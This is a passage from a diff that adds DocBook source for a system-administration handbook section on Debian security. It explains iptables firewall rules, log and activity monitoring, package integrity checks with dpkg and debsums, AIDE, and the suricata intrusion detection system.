+        <title>How <emphasis>netfilter</emphasis> chains are called</title>
+        <mediaobject>
+          <imageobject>
+            <imagedata fileref="images/netfilter.png" scalefit="1" width="65%" />
+          </imageobject>
+        </mediaobject>
+      </figure>
+
+      <para>Each chain is a list of rules; each rule is a set of conditions
+      and an action to execute when the conditions are met. When processing
+      a packet, the firewall scans the appropriate chain, one rule after
+      another; when the conditions for one rule are met, it “jumps”
+      (hence the <literal>-j</literal> option in the commands) to the
+      specified action to continue processing. The most common behaviors
+      are standardized, and dedicated actions exist for them. Taking one of
+      these standard actions interrupts the processing of the chain, since
+      the packet's fate is already sealed (barring an exception mentioned
+      below):</para>
+
+      <sidebar>
+        <title><emphasis>BACK TO BASICS</emphasis> ICMP</title>
+
+	<para>ICMP (<emphasis>Internet Control Message </emphasis>Protocol)
+	is the protocol used to transmit complementary information on
+	communications. It allows testing network connectivity with the
+	<command>ping</command> command (which sends an ICMP <emphasis>echo
+	request</emphasis> message, which the recipient is meant to answer
+	with an ICMP <emphasis>echo reply</emphasis> message). It signals a
+	firewall rejecting a packet, indicates an overflow in a receive
+	buffer, proposes a better route for the next packets in the
+	connection, and so on. This protocol is defined by several RFC
+	documents; the initial RFC777 and RFC792 were soon completed and
+        extended.
+        <ulink type="block" url="http://www.faqs.org/rfcs/rfc777.html" />
+        <ulink type="block" url="http://www.faqs.org/rfcs/rfc792.html" />
+        </para>
+
+	<para>For reference, a receive buffer is a small memory zone
+	storing data between the time it arrives from the network and the
+	time the kernel handles it. If this zone is full, new data cannot
+	be received, and ICMP signals the problem, so that the emitter can
+	slow down its transfer rate (which should ideally reach an
+	equilibrium after some time).</para>
+        <indexterm><primary>ICMP</primary></indexterm>
+        <indexterm><primary>Internet Control Message Protocol</primary></indexterm>
+        <indexterm><primary>receive buffer</primary></indexterm>
+        <indexterm><primary>buffer</primary><secondary>receive buffer</secondary></indexterm>
+        <indexterm><primary><command>ping</command></primary></indexterm>
+
+	<para>Note that although an IPv4 network can work without ICMP,
+	ICMPv6 is strictly required for an IPv6 network, since it combines
+	several functions that were, in the IPv4 world, spread across
+	ICMPv4, IGMP (<emphasis>Internet Group Membership
+	Protocol</emphasis>) and ARP (<emphasis>Address Resolution
+	Protocol</emphasis>). ICMPv6 is defined in RFC4443. <ulink type="block" url="http://www.faqs.org/rfcs/rfc4443.html" /></para>
+      </sidebar>
+
+      <para></para>
+      <itemizedlist>
+        <listitem>
+	  <para><literal>ACCEPT</literal>: allow the packet to go on its
+	  way;</para>
+        </listitem>
+        <listitem>
+	  <para><literal>REJECT</literal>: reject the packet with an ICMP
+	  error packet (the <literal>--reject-with
+	  <replaceable>type</replaceable></literal> option to
+	  <command>iptables</command> allows selecting the type of
+	  error);</para>
+        </listitem>
+        <listitem>
+	  <para><literal>DROP</literal>: delete (ignore) the packet;</para>
+        </listitem>
+        <listitem>
+	  <para><literal>LOG</literal>: log (via
+	  <command>syslogd</command>) a message with a description of the
+	  packet; note that this action does not interrupt processing, and
+	  the execution of the chain continues at the next rule, which is
+	  why logging refused packets requires both a LOG and a REJECT/DROP
+	  rule;</para>
+        </listitem>
+        <listitem>
+	  <para><literal>ULOG</literal>: log a message via
+	  <command>ulogd</command>, which can be better adapted and more
+	  efficient than <command>syslogd</command> for handling large
+	  numbers of messages; note that this action, like LOG, also
+	  returns processing to the next rule in the calling chain;</para>
+        </listitem>
+        <listitem>
+	  <para><replaceable>chain_name</replaceable>: jump to the given
+	  chain and evaluate its rules;</para>
+        </listitem>
+        <listitem>
+	  <para><literal>RETURN</literal>: interrupt processing of the
+	  current chain, and return to the calling chain; in case the
+	  current chain is a standard one, there's no calling chain, so the
+	  default action (defined with the <literal>-P</literal> option to
+	  <command>iptables</command>) is executed instead;</para>
+        </listitem>
+        <listitem>
+	  <para><literal>SNAT</literal> (only in the
+	  <literal>nat</literal> table): apply
+	  <emphasis>Source NAT</emphasis> (extra options describe the
+	  exact changes to apply);</para>
+        </listitem>
+        <listitem>
+	  <para><literal>DNAT</literal> (only in the
+	  <literal>nat</literal> table): apply
+	  <emphasis>Destination NAT</emphasis> (extra options describe
+	  the exact changes to apply);</para>
+        </listitem>
+        <listitem>
+	  <para><literal>MASQUERADE</literal> (only in the
+	  <literal>nat</literal> table): apply
+	  <emphasis>masquerading</emphasis> (a special case of
+	  <emphasis>Source NAT</emphasis>);</para>
+        </listitem>
+        <listitem>
+	  <para><literal>REDIRECT</literal> (only in the
+	  <literal>nat</literal> table): redirect a
+	  packet to a given port of the firewall itself; this can be
+	  used to set up a transparent web proxy that works with no
+	  configuration on the client side, since the client thinks it
+	  connects to the recipient whereas the communications
+	  actually go through the proxy.</para>
+        </listitem>
+      </itemizedlist>
+
+      <para>Other actions, particularly those concerning the
+      <literal>mangle</literal> table, are outside the scope of this text.
+      The <citerefentry><refentrytitle>iptables</refentrytitle>
+      <manvolnum>8</manvolnum></citerefentry> and
+      <citerefentry><refentrytitle>ip6tables</refentrytitle>
+      <manvolnum>8</manvolnum></citerefentry> have a comprehensive
+      list.</para>
+    </section>
+    <section id="sect.iptables">
+      <title>Syntax of <command>iptables</command> and <command>ip6tables</command></title>
+
+      <para>The <command>iptables</command> and
+      <command>ip6tables</command> commands allow manipulating tables,
+      chains and rules. Their <literal>-t
+      <replaceable>table</replaceable></literal> option indicates which
+      table to operate on (by default, <literal>filter</literal>).</para>
+      <indexterm><primary><command>iptables</command></primary></indexterm>
+      <indexterm><primary><command>ip6tables</command></primary></indexterm>
+      <section id="sect.iptables-command">
+        <title>Commands</title>
+
+	<para>The <literal>-N
+	<replaceable>chain</replaceable></literal> option creates a
+	new chain. The <literal>-X
+	<replaceable>chain</replaceable></literal> deletes an empty
+	and unused chain. The <literal>-A
+	<replaceable>chain</replaceable>
+	<replaceable>rule</replaceable></literal> adds a rule at the
+	end of the given chain. The <literal>-I
+	<replaceable>chain</replaceable>
+	<replaceable>rule_num</replaceable>
+	<replaceable>rule</replaceable></literal> option inserts a
+	rule before the rule number
+	<replaceable>rule_num</replaceable>. The <literal>-D
+	<replaceable>chain</replaceable>
+	<replaceable>rule_num</replaceable></literal> (or <literal>-D
+	<replaceable>chain</replaceable>
+	<replaceable>rule</replaceable></literal>) option deletes a
+	rule in a chain; the first syntax identifies the rule to be
+	deleted by its number, while the latter identifies it by its
+	contents. The <literal>-F
+	<replaceable>chain</replaceable></literal> option flushes a
+	chain (deletes all its rules); if no chain is mentioned, all
+	the rules in the table are deleted. The <literal>-L
+	<replaceable>chain</replaceable></literal> option lists the
+	rules in the chain. Finally, the <literal>-P
+	<replaceable>chain</replaceable>
+	<replaceable>action</replaceable></literal> option defines the
+	default action, or “policy”, for a given chain; note that only
+	standard chains can have such a policy.</para>
+      </section>
+      <section id="sect.iptables-rules">
+        <title>Rules</title>
+        <indexterm><primary>filtering rule</primary></indexterm>
+
+	<para>Each rule is expressed as
+	<literal><replaceable>conditions</replaceable> -j
+	<replaceable>action</replaceable>
+	<replaceable>action_options</replaceable></literal>.  If
+	several conditions are described in the same rule, then the
+	criterion is the conjunction (logical
+	<emphasis>and</emphasis>) of the conditions, which is at least
+	as restrictive as each individual condition.</para>
+
+	<para>The <literal>-p <replaceable>protocol</replaceable></literal>
+	condition matches the protocol field of the IP packet. The most
+	common values are <literal>tcp</literal>, <literal>udp</literal>,
+	<literal>icmp</literal>, and <literal>icmpv6</literal>. Prefixing
+	the condition with an exclamation mark negates the condition, which
+	then becomes a match for “any packets with a different protocol
+	than the specified one”. This negation mechanism is not specific
+	to the <literal>-p</literal> option and it can be applied to all
+	other conditions too.</para>
+
+	<para>The <literal>-s <replaceable>address</replaceable></literal>
+	or <literal>-s <replaceable>network/mask</replaceable></literal>
+	condition matches the source address of the packet.
+	Correspondingly, <literal>-d
+	<replaceable>address</replaceable></literal> or <literal>-d
+	<replaceable>network/mask</replaceable></literal> matches the
+	destination address.</para>
+
+	<para>The <literal>-i
+	<replaceable>interface</replaceable></literal> condition selects
+	packets coming from the given network interface. <literal>-o
+	<replaceable>interface</replaceable></literal> selects packets
+	going out on a specific interface.</para>
+
+	<para>There are more specific conditions, depending on the generic
+	conditions described above. For instance, the <literal>-p
+	tcp</literal> condition can be complemented with conditions on the
+	TCP ports, with clauses such as <literal>--source-port
+	<replaceable>port</replaceable></literal> and
+	<literal>--destination-port
+	<replaceable>port</replaceable></literal>.</para>
+
+	<para>The <literal>--state
+	<replaceable>state</replaceable></literal> condition matches the
+	state of a packet in a connection (this requires the
+	<command>ipt_conntrack</command> kernel module, for connection
+	tracking). The <literal>NEW</literal> state describes a packet
+	starting a new connection; <literal>ESTABLISHED</literal> matches
+	packets belonging to an already existing connection, and
+	<literal>RELATED</literal> matches packets initiating a new
+	connection related to an existing one (which is useful for the
+	<literal>ftp-data</literal> connections in the “active” mode of
+	the FTP protocol).</para>
+
+	<para>The previous section lists available actions, but not their
+	respective options. The <literal>LOG</literal> action, for
+	instance, has the following options:</para>
+        <itemizedlist>
+          <listitem>
+	    <para><literal>--log-level</literal>, with default value
+	    <literal>warning</literal>, indicates the
+	    <command>syslog</command> severity level;</para>
+          </listitem>
+          <listitem>
+	    <para><literal>--log-prefix</literal> allows specifying a text
+	    prefix to differentiate between logged messages;</para>
+          </listitem>
+          <listitem>
+	    <para><literal>--log-tcp-sequence</literal>,
+	    <literal>--log-tcp-options</literal> and
+	    <literal>--log-ip-options</literal> indicate extra data to be
+	    integrated into the message: respectively, the TCP sequence
+	    number, TCP options, and IP options.</para>
+          </listitem>
+        </itemizedlist>
+
+	<para>The <literal>DNAT</literal> action 
+	provides the <literal>--to-destination
+	<replaceable>address</replaceable>:<replaceable>port</replaceable></literal>
+	option to indicate the new destination IP address and/or port.
+	Similarly, <literal>SNAT</literal> provides <literal>--to-source
+	<replaceable>address</replaceable>:<replaceable>port</replaceable></literal>
+	to indicate the new source IP address and/or port.</para>
+
+	<para>The <literal>REDIRECT</literal> action (only available
+	if NAT is available) provides the <literal>--to-ports
+	<replaceable>port(s)</replaceable></literal> option to
+	indicate the port, or port range, where the packets should be
+	redirected.</para>
+      </section>
+    </section>
+    <section id="sect.creating-rules">
+      <title>Creating Rules</title>
+
+      <para>Each rule creation requires one invocation of
+      <command>iptables</command>/<command>ip6tables</command>. Typing
+      these commands manually can be tedious, so the calls are usually
+      stored in a script so that the same configuration is set up
+      automatically every time the machine boots. This script can be
+      written by hand, but it can also be interesting to prepare it with a
+      high-level tool such as <command>fwbuilder</command>.</para>
+
+      
+      <screen>
+<computeroutput># </computeroutput><userinput>apt install fwbuilder</userinput>
+</screen>
+
+      <para>The principle is simple. In the first step, one needs to
+      describe all the elements that will be involved in the actual
+      rules:</para>
+      <itemizedlist>
+        <listitem>
+	  <para>the firewall itself, with its network interfaces;</para>
+        </listitem>
+        <listitem>
+	  <para>the networks, with their corresponding IP ranges;</para>
+        </listitem>
+        <listitem>
+	  <para>the servers;</para>
+        </listitem>
+        <listitem>
+	  <para>the ports belonging to the services hosted on the
+	  servers.</para>
+        </listitem>
+      </itemizedlist>
+
+      <para>The rules are then created with simple drag-and-drop actions on
+      the objects. A few contextual menus can change the condition
+      (negating it, for instance). Then the action needs to be chosen and
+      configured.</para>
+
+      <para>As far as IPv6 is concerned, one can either create two distinct
+      rulesets for IPv4 and IPv6, or create only one and let
+      <command>fwbuilder</command> translate the rules according to the
+      addresses assigned to the objects.</para>
+
+      <figure id="figure.fwbuilder">
+        <title>Fwbuilder's main window</title>
+        <mediaobject>
+          <imageobject>
+            <imagedata fileref="images/fwbuilder.png" scalefit="1" />
+          </imageobject>
+        </mediaobject>
+      </figure>
+      <indexterm><primary><command>fwbuilder</command></primary></indexterm>
+
+      <para><command>fwbuilder</command> can then generate a script
+      configuring the firewall according to the rules that have been
+      defined. Its modular architecture gives it the ability to generate
+      scripts targeting different systems (<command>iptables</command> for
+      Linux, <command>ipf</command> for FreeBSD and
+      <command>pf</command> for OpenBSD).</para>
+
+    </section>
+    <section id="sect.install-rules-at-boot">
+      <title>Installing the Rules at Each Boot</title>
+
+      <para>In other cases, the recommended way is to register the
+      configuration script in an <literal>up</literal> directive of the
+      <filename>/etc/network/interfaces</filename> file. In the following
+      example, the script is stored under
+      <filename>/usr/local/etc/arrakis.fw</filename>.</para>
+
+      <example id="example.network-interfaces-firewall">
+        <title><filename>interfaces</filename> file calling firewall script</title>
+
+        <programlisting>auto eth0
+iface eth0 inet static
+    address 192.168.0.1
+    network 192.168.0.0
+    netmask 255.255.255.0
+    broadcast 192.168.0.255
+    up /usr/local/etc/arrakis.fw
+</programlisting>
+      </example>
+      <para>This obviously assumes that you are using <emphasis role="pkg">ifupdown</emphasis> to configure the network
+        interfaces. If you are using something else (like
+        <emphasis>NetworkManager</emphasis> or
+        <emphasis>systemd-networkd</emphasis>), then refer to their
+        respective documentation to find out ways to execute a script
+        after the interface has been brought up.
+      </para>
+
+    </section>
+  </section>
+  <section id="sect.supervision">
+    <title>Supervision: Prevention, Detection, Deterrence</title>
+    <indexterm><primary>monitoring</primary></indexterm>
+
+    <para>Monitoring is an integral part of any security policy for several
+    reasons. Among them, that the goal of security is usually not
+    restricted to guaranteeing data confidentiality, but it also includes
+    ensuring availability of the services. It is therefore imperative to
+    check that everything works as expected, and to detect in a timely
+    manner any deviant behavior or change in quality of the service(s)
+    rendered. Monitoring activity can help detecting intrusion
+    attempts and enable a swift reaction before they cause grave
+    consequences. This section reviews some tools that can be used to
+    monitor several aspects of a Debian system. As such, it completes
+    <xref linkend="sect.monitoring" />.</para>
+    <section id="sect.logcheck">
+      <title>Monitoring Logs with <command>logcheck</command></title>
+      <indexterm><primary><command>logcheck</command></primary></indexterm>
+      <indexterm><primary>logs</primary><secondary>monitoring</secondary></indexterm>
+      <indexterm><primary>monitoring</primary><secondary>log files</secondary></indexterm>
+
+      <para>The <command>logcheck</command> program monitors log files
+      every hour by default. It sends unusual log messages in emails to the
+      administrator for further analysis.</para>
+
+      <para>The list of monitored files is stored in
+      <filename>/etc/logcheck/logcheck.logfiles</filename>; the default
+      values work fine if the <filename>/etc/rsyslog.conf</filename> file
+      has not been completely overhauled.</para>
+
+      <para><command>logcheck</command> can work in one of three more or
+      less detailed modes: <emphasis>paranoid</emphasis>,
+      <emphasis>server</emphasis> and <emphasis>workstation</emphasis>. The
+      first one is <emphasis>very</emphasis> verbose, and should probably
+      be restricted to specific servers such as firewalls. The second (and
+      default) mode is recommended for most servers. The last one is
+      designed for workstations, and is even terser (it filters out more
+      messages).</para>
+
+      <para>In all three cases, <command>logcheck</command> should probably
+      be customized to exclude some extra messages (depending on installed
+      services), unless the admin really wishes to receive hourly batches
+      of long uninteresting emails. Since the message selection mechanism
+      is rather complex,
+      <filename>/usr/share/doc/logcheck-database/README.logcheck-database.gz</filename>
+      is a required — if challenging — read.</para>
+
+      <para>The applied rules can be split into several types:</para>
+      <itemizedlist>
+        <listitem>
+	  <para>those that qualify a message as a cracking attempt (stored
+	  in a file in the <filename>/etc/logcheck/cracking.d/</filename>
+	  directory);</para>
+        </listitem>
+        <listitem>
+	  <para>those canceling such a qualification
+	  (<filename>/etc/logcheck/cracking.ignore.d/</filename>);</para>
+        </listitem>
+        <listitem>
+	  <para>those classifying a message as a security alert
+	  (<filename>/etc/logcheck/violations.d/</filename>);</para>
+        </listitem>
+        <listitem>
+	  <para>those canceling this classification
+	  (<filename>/etc/logcheck/violations.ignore.d/</filename>);</para>
+        </listitem>
+        <listitem>
+	  <para>finally, those applying to the remaining messages
+	  (considered as <emphasis>system events</emphasis>).</para>
+        </listitem>
+      </itemizedlist>
+
+      <sidebar>
+        <title><emphasis>CAUTION</emphasis> Ignoring a message</title>
+
+	<para>Any message tagged as a cracking attempt or a security alert
+	(following a rule stored in a
+	<filename>/etc/logcheck/violations.d/myfile</filename> file) can
+	only be ignored by a rule in a
+	<filename>/etc/logcheck/violations.ignore.d/myfile</filename> or
+	<filename>/etc/logcheck/violations.ignore.d/myfile-<replaceable>extension</replaceable></filename>
+	file.</para>
+      </sidebar>
+
+      <para>A system event is always signaled unless a rule in one of the
+      <filename>/etc/logcheck/ignore.d.{paranoid,server,workstation}/</filename>
+      directories states the event should be ignored. Of course, the only
+      directories taken into account are those corresponding to verbosity
+      levels equal or greater than the selected operation mode.</para>
+    </section>
+    <section id="sect.monitoring-activity">
+      <title>Monitoring Activity</title>
+      <indexterm><primary>monitoring</primary><secondary>activity</secondary></indexterm>
+      <indexterm><primary>activity, monitoring</primary></indexterm>
+      <section id="sect.real-time-monitoring">
+        <title>In Real Time</title>
+
+	<para><command>top</command> is an interactive tool that displays a
+	list of currently running processes. The default sorting is based
+	on the current amount of processor use and can be obtained with the
+	<keycap>P</keycap> key. Other sort orders include a sort by
+	occupied memory (<keycap>M</keycap> key), by total processor time
+	(<keycap>T</keycap> key) and by process identifier
+	(<keycap>N</keycap> key). The <keycap>k</keycap> key allows killing
+	a process by entering its process identifier. The
+	<keycap>r</keycap> key allows <emphasis>renicing</emphasis> a
+	process, i.e. changing its priority.</para>
+        <indexterm><primary><command>top</command></primary></indexterm>
+
+	<para>When the system seems to be overloaded,
+	<command>top</command> is a great tool to see which processes are
+	competing for processor time or consume too much memory. In
+	particular, it is often interesting to check if the processes
+	consuming resources match the real services that the machine is
+	known to host. An unknown process running as the www-data user
+	should really stand out and be investigated, since it's probably an
+	instance of software installed and executed on the system through a
+	vulnerability in a web application.</para>
+
+	<para><command>top</command> is a very flexible tool and its manual
+	page gives details on how to customize its display and adapt it to
+	one's personal needs and habits.</para>
+
+        <para>The <command>gnome-system-monitor</command> graphical tool
+        is similar to <command>top</command> and it provides roughly the same
+	features.</para>
+
+        <indexterm><primary><command>gnome-system-monitor</command></primary></indexterm>
+      </section>
+      <section id="sect.monitoring-history">
+        <title>History</title>
+        <indexterm><primary>activity, history</primary></indexterm>
+
+	<para>Processor load, network traffic and free disk space are
+	information that are constantly varying. Keeping a history of their
+	evolution is often useful in determining exactly how the computer
+	is used.</para>
+        <indexterm><primary>SNMP</primary></indexterm>
+        <indexterm><primary>Simple Network Management Protocol</primary></indexterm>
+
+	<para>There are many dedicated tools for this task. Most can fetch
+	data via SNMP (<emphasis>Simple Network Management
+	Protocol</emphasis>) in order to centralize this information. An
+	added benefit is that this allows fetching data from network
+	elements that may not be general-purpose computers, such as
+	dedicated network routers or switches.</para>
+
+	<para>This book deals with Munin in some detail (see <xref linkend="sect.munin" />) as part of <xref linkend="advanced-administration" xrefstyle="select: label  quotedtitle" />. Debian also provides a similar tool, <emphasis role="pkg">cacti</emphasis>. Its deployment is slightly more
+	complex, since it is based solely on SNMP. Despite having a web
+	interface, grasping the concepts involved in configuration still
+	requires some effort. Reading the HTML documentation
+	(<filename>/usr/share/doc/cacti/html/index.html</filename>) should
+	be considered a prerequisite.</para>
+
+        <sidebar>
+          <title><emphasis>ALTERNATIVE</emphasis> <command>mrtg</command></title>
+          <indexterm><primary><command>mrtg</command></primary></indexterm>
+
+	  <para><command>mrtg</command> (in the similarly-named package) is
+	  an older tool. Despite some rough edges, it can aggregate
+	  historical data and display them as graphs. It includes a number
+	  of scripts dedicated to collecting the most commonly monitored
+	  data such as processor load, network traffic, web page hits, and
+	  so on.</para>
+
+	  <para>The <emphasis role="pkg">mrtg-contrib</emphasis> and
+	  <emphasis role="pkg">mrtgutils</emphasis> packages contain
+	  example scripts that can be used directly.</para>
+        </sidebar>
+      </section>
+    </section>
+    <section>
+      <title>Detecting Changes</title>
+
+      <para>Once the system is installed and configured, and barring
+      security upgrades, there's usually no reason for most of the files
+      and directories to evolve, data excepted. It is therefore interesting
+      to make sure that files actually do not change: any unexpected change
+      would therefore be worth investigating. This section presents a few
+      tools able to monitor files and to warn the administrator when an
+      unexpected change occurs (or simply to list such changes).</para>
+      <section id="sect.dpkg-verify">
+        <title>Auditing Packages with <command>dpkg --verify</command></title>
+        <indexterm><primary><command>dpkg</command></primary><secondary><command>dpkg --verify</command></secondary></indexterm>
+        <sidebar>
+          <title><emphasis>GOING FURTHER</emphasis> Protecting against upstream changes</title>
+
+	  <para><command>dpkg --verify</command> is useful in detecting changes
+	  to files coming from a Debian package, but it will be useless if
+	  the package itself is compromised, for instance if the Debian
+	  mirror is compromised. Protecting against this class of attacks
+	  involves using APT's digital signature verification system (see
+	  <xref linkend="sect.package-authentication" />), and taking care
+	  to only install packages from a certified origin.</para>
+        </sidebar>
+
+        <para><command>dpkg --verify</command> (or <command>dpkg
+            -V</command>) is an interesting tool since it allows finding
+          what installed files have been modified (potentially by an
+          attacker), but this should be taken with a grain of salt.  To do
+          its job it relies on checksums stored in dpkg's own database
+          which is stored on the hard disk (they can be found in
+          <filename>/var/lib/dpkg/info/<replaceable>package</replaceable>.md5sums</filename>);
+          a thorough attacker will therefore update these files so they
+          contain the new checksums for the subverted files.
+        </para>
+
+        <sidebar>
+          <title><emphasis>BACK TO BASICS</emphasis> File fingerprint</title>
+	  <indexterm><primary>fingerprint</primary></indexterm>
+	  <indexterm><primary>control sum</primary></indexterm>
+	  <indexterm><primary>MD5</primary></indexterm>
+	  <indexterm><primary>SHA1</primary></indexterm> 
+          <para>As a reminder: a
+          fingerprint is a value, often a number (even though in hexadecimal
+          notation), that contains a kind of signature for the contents of a
+          file. This signature is calculated with an algorithm (MD5 or SHA1
+          being well-known examples) that more or less guarantee that even
+          the tiniest change in the file contents implies a change in the
+          fingerprint; this is known as the “avalanche effect”. This
+          allows a simple numerical fingerprint to serve as a litmus test to
+          check whether the contents of a file have been altered. These
+          algorithms are not reversible; in other words, for most of them,
+          knowing a fingerprint doesn't allow finding the corresponding
+          contents. Recent mathematical advances seem to weaken the
+          absoluteness of these principles, but their use is not called into
+          question so far, since creating different contents yielding the
+          same fingerprint still seems to be quite a difficult task.
+          </para>
+        </sidebar>
+
+        <para>Running <command>dpkg -V</command> will verify all installed
+          packages and will print out a line for each file with a failing
+          test. The output format is the same as the one of <command>rpm
+            -V</command> where each character denotes a test on some
+          specific meta-data. Unfortunately <command>dpkg</command> does
+          not store the meta-data needed for most tests and will thus
+          output question marks for them. Currently only the checksum test
+          can yield a "5" on the third character (when it fails).
+        </para>
+        <screen>
+<computeroutput># </computeroutput><userinput>dpkg -V</userinput>
+<computeroutput>??5??????   /lib/systemd/system/ssh.service
+??5?????? c /etc/libvirt/qemu/networks/default.xml
+??5?????? c /etc/lvm/lvm.conf
+??5?????? c /etc/salt/roster</computeroutput>
+</screen>
+        <para>In the sample above, dpkg reports a change to SSH's service file
+        that the administrator made to the packaged file instead of using
+        an appropriate <filename>/etc/systemd/system/ssh.service</filename>
+        override (which would be stored below <filename>/etc</filename> like
+        any configuration change should be). It also lists multiple
+        configuration files (identified by the "c" letter on the second
+        field) that had been legitimately modified.</para>
+      </section>
+
+      <section id="sect.debsums">
+        <title>Auditing Packages: <command>debsums</command> and its Limits</title>
+        <indexterm><primary><command>debsums</command></primary></indexterm>
+
+        <para>
+          <command>debsums</command> is the ancestor of <command>dpkg -V</command>
+          and is thus mostly obsolete. It suffers from the same limitations than
+          dpkg. Fortunately, some of the limitations can be worked-around (whereas dpkg
+          does not offer similar work-arounds).
+        </para>
+
+        <para>
+          Since the data on the disk cannot be trusted, <command>debsums</command>
+          offers to do its checks based on <filename>.deb</filename> files instead of
+          relying on dpkg's database. To download trusted <filename>.deb</filename> files
+          of all the packages installed, we can rely on APT's authenticated downloads.
+	  This operation can be slow and tedious, and should therefore not be
+	  considered a proactive technique to be used on a regular
+          basis.
+        </para>
+
+        <screen>
+<computeroutput># </computeroutput><userinput>apt-get --reinstall -d install `grep-status -e 'Status: install ok installed' -n -s Package`</userinput>
+<computeroutput>[ ... ]
+# </computeroutput><userinput>debsums -p /var/cache/apt/archives --generate=all</userinput>
+</screen>
+
+	<para>Note that this example uses the
+	<command>grep-status</command> command from the <emphasis role="pkg">dctrl-tools</emphasis> package, which is not installed by
+	default.</para>
+      </section>
+      <section>
+        <title>Monitoring Files: AIDE</title>
+        <indexterm><primary><emphasis role="pkg">aide</emphasis> (Debian package)</primary></indexterm>
+
+	<para>The AIDE tool (<emphasis>Advanced Intrusion Detection
+	Environment</emphasis>) allows checking file integrity, and
+	detecting any change against a previously recorded image of the
+	valid system. This image is stored as a database
+	(<filename>/var/lib/aide/aide.db</filename>) containing the
+	relevant information on all files of the system (fingerprints,
+	permissions, timestamps and so on). This database is first
+	initialized with <command>aideinit</command>; it is then used daily
+	(by the <filename>/etc/cron.daily/aide</filename> script) to check
+	that nothing relevant changed. When changes are detected, AIDE
+	records them in log files
+	(<filename>/var/log/aide/*.log</filename>) and sends its findings
+	to the administrator by email.</para>
+
+        <sidebar>
+          <title><emphasis>IN PRACTICE</emphasis> Protecting the database</title>
+
+	  <para>Since AIDE uses a local database to compare the states of
+	  the files, the validity of its results is directly linked to the
+	  validity of the database. If an attacker gets root permissions on
+	  a compromised system, they will be able to replace the database
+	  and cover their tracks. A possible workaround would be to store
+	  the reference data on read-only storage media.</para>
+        </sidebar>
+
+	<para>Many options in <filename>/etc/default/aide</filename> can be
+	used to tweak the behavior of the <emphasis role="pkg">aide</emphasis> package. The AIDE configuration proper
+	is stored in <filename>/etc/aide/aide.conf</filename> and
+	<filename>/etc/aide/aide.conf.d/</filename> (actually, these files
+	are only used by <command>update-aide.conf</command> to generate
+	<filename>/var/lib/aide/aide.conf.autogenerated</filename>).
+	Configuration indicates which properties of which files need to be
+	checked. For instance, the contents of log files changes routinely,
+	and such changes can be ignored as long as the permissions of these
+	files stay the same, but both contents and permissions of
+	executable programs must be constant. Although not very complex,
+	the configuration syntax is not fully intuitive, and reading the
+	<citerefentry><refentrytitle>aide.conf</refentrytitle>
+	<manvolnum>5</manvolnum></citerefentry> manual page is therefore
+	recommended.</para>
+
+	<para>A new version of the database is generated daily in
+	<filename>/var/lib/aide/aide.db.new</filename>; if all recorded
+	changes were legitimate, it can be used to replace the reference
+	database.</para>
+
+        <sidebar>
+          <title><emphasis>ALTERNATIVE</emphasis> Tripwire and Samhain</title>
+
+	  <para>Tripwire is very similar to AIDE; even the configuration
+	  file syntax is almost the same. The main addition provided by
+	  <emphasis role="pkg">tripwire</emphasis> is a mechanism to sign
+	  the configuration file, so that an attacker cannot make it point
+	  at a different version of the reference database.</para>
+
+	  <para>Samhain also offers similar features, as well as some
+	  functions to help detecting rootkits (see the sidebar
+	  <xref linkend="sidebar.the-checksecurity-and-chkrootkit-rkhunter-packages" />).
+	  It can also be deployed globally on a network, and
+	  record its traces on a central server (with a signature).</para>
+        </sidebar>
+
+        <sidebar id="sidebar.the-checksecurity-and-chkrootkit-rkhunter-packages">
+          <title><emphasis>QUICK LOOK</emphasis> The <emphasis role="pkg">checksecurity</emphasis> and <emphasis role="pkg">chkrootkit</emphasis>/<emphasis role="pkg">rkhunter</emphasis> packages</title>
+          <indexterm><primary><emphasis role="pkg">checksecurity</emphasis></primary></indexterm>
+
+	  <para>The first of these packages contains several small scripts
+	  performing basic checks on the system (empty passwords, new
+	  setuid files, and so on) and warning the administrator if
+	  required. Despite its explicit name, an administrator should not
+	  rely solely on it to make sure a Linux system is secure.</para>
+
+	  <para>The <emphasis role="pkg">chkrootkit</emphasis> and
+	  <emphasis role="pkg">rkhunter</emphasis> packages allow looking
+	  for <emphasis>rootkits</emphasis> potentially installed on the
+	  system. As a reminder, these are pieces of software designed to
+	  hide the compromise of a system while discreetly keeping control
+	  of the machine. The tests are not 100% reliable, but they can
+	  usually draw the administrator's attention to potential
+	  problems.</para>
+        </sidebar>
+      </section>
+    </section>
+    <section id="sect.intrusion-detection">
+      <title>Detecting Intrusion (IDS/NIDS)</title>
+      <indexterm><primary>detection, intrusion</primary></indexterm>
+      <indexterm><primary>intrusion detection</primary></indexterm>
+      <indexterm><primary>IDS</primary></indexterm>
+      <indexterm><primary>intrusion detection system</primary></indexterm>
+      <indexterm><primary>NIDS</primary></indexterm>
+      <indexterm><primary>Network</primary><secondary>IDS</secondary></indexterm>
+
+      <sidebar>
+        <title><emphasis>BACK TO BASICS</emphasis> Denial of service</title>
+        <indexterm><primary>denial of service</primary></indexterm>
+
+	<para>A “denial of service” attack has only one goal: to make a
+	service unavailable. Whether such an attack involves overloading
+	the server with queries or exploiting a bug, the end result is the
+	same: the service is no longer operational. Regular users are
+	unhappy, and the entity hosting the targeted network service
+	suffers a loss in reputation (and possibly in revenue, for instance
+	if the service was an e-commerce site).</para>
+
+	<para>Such an attack is sometimes “distributed”; this usually
+	involves overloading the server with large numbers of queries
+	coming from many different sources so that the server becomes
+	unable to answer the legitimate queries. These types of attacks
+	have gained well-known acronyms: <acronym>DDoS</acronym> and
+	<acronym>DoS</acronym> (depending on whether the denial of service
+	attack is distributed or not).</para>
+      </sidebar>
+
+      <para><command>suricata</command> (in the Debian package of the same
+      name) is a NIDS — a <emphasis>Network Intrusion Detection
+      System</emphasis>. Its function is to listen to the network and try
+      to detect infiltration attempts and/or hostile acts (including denial
+      of service attacks). All these events are logged in multiple files
+      in <filename>/var/log/suricata</filename>. There are third party tools
+      (Kibana/logstash) to better browse all the data collected.
+      <ulink type="block" url="http://suricata-ids.org" />
+      <ulink type="block" url="https://www.elastic.co/products/kibana" />
+      </para>
+      <indexterm><primary><command>snort</command></primary></indexterm>
+      <indexterm><primary><command>suricata</command></primary></indexterm>
+
+      <sidebar>
+        <title><emphasis>CAUTION</emphasis> Range of action</title>
+
+	<para>The effectiveness of <command>suricata</command> is limited by
+	the traffic seen on the monitored network interface. It will
+	obviously not be able to detect anything if it cannot observe the
+	real traffic. When plugged into a network switch, it will therefore
+	only monitor attacks targeting the machine it runs on, which is
+	probably not the intention. The machine hosting
+	<command>suricata</command> should therefore be plugged into the
+	“mirror” port of the switch, which is usually dedicated to
+	chaining switches and therefore gets all the traffic.</para>
+      </sidebar>
+
+      <para>
